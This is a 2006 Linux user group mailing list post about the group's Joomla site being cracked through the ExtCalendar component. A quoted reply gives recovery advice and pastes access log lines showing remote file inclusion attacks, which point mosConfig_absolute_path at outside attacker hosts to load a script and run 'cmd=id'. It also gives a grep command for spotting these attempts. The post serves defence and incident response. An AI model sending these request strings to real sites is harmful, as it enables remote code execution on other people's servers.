PLUG website down
Alan Dayley
alandd at consultpros.com
Tue Jul 18 18:19:57 MST 2006
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
JD Austin wrote:
> If you're not on version 1.0.10 upgrade now:
> http://www.joomla.org/content/view/1510/74/
> I wouldn't be surprised if they make major changes in Joomla to stomp
> out this type of thing.
>
> In all cases I've had an issue the database was unaffected, only the files.
> After the initial panic that I might have been rooted I was relieved
> when I found out how they whacked the index.php and configuration.php
> files on a few of my inactive sites.
>
> After you restore the site, remove com_extcalendar and com_galeria if
> they're still installed.
> Check the directory structure to make sure they're gone.
> Also check your temp directory for strangeness.. like a '.a' directory.
>
> If you check your logs you'll find stuff like this:
>
> XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
> XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>
>
> I regularly check to see what they're trying to circumvent now by
> grepping for this type of vulnerability in the apache access logs:
> /bin/grep mosConfig_absolute_path=http
> /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack
> attempts' jd at twingeckos.com
> The location of your apache logs may be different. If you don't have
> root you can download the logs for your domain and grep them locally.
>
> JD
Thanks, JD. Good advice.
I am in contact with Integrum. The site was, in fact, cracked via the
ext_calendar component that I thought I had patched. Integrum caught it
early this morning and took the site off line to thwart the attack. We
are now discussing the means of getting back online without re-instating
the vulnerability.
It will probably be tomorrow before the site is back online simply
because Integrum has been handling issues with it since very early this
morning. They need to leave it for a while.
I thank them for their efforts and support!
I'll be on the phone with them tomorrow morning. I'll keep updating
status here in the list.
Alan
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org
iD8DBQFEvYi9DQw/VSQuFZYRAqpxAJ9vR3s9GGc+yvKCQ6ciMNCUNe1wPACfSHS1
WcdlshZzjYH2ryyDdlyP6A8=
=Np1E
-----END PGP SIGNATURE-----
More information about the PLUG-discuss
mailing list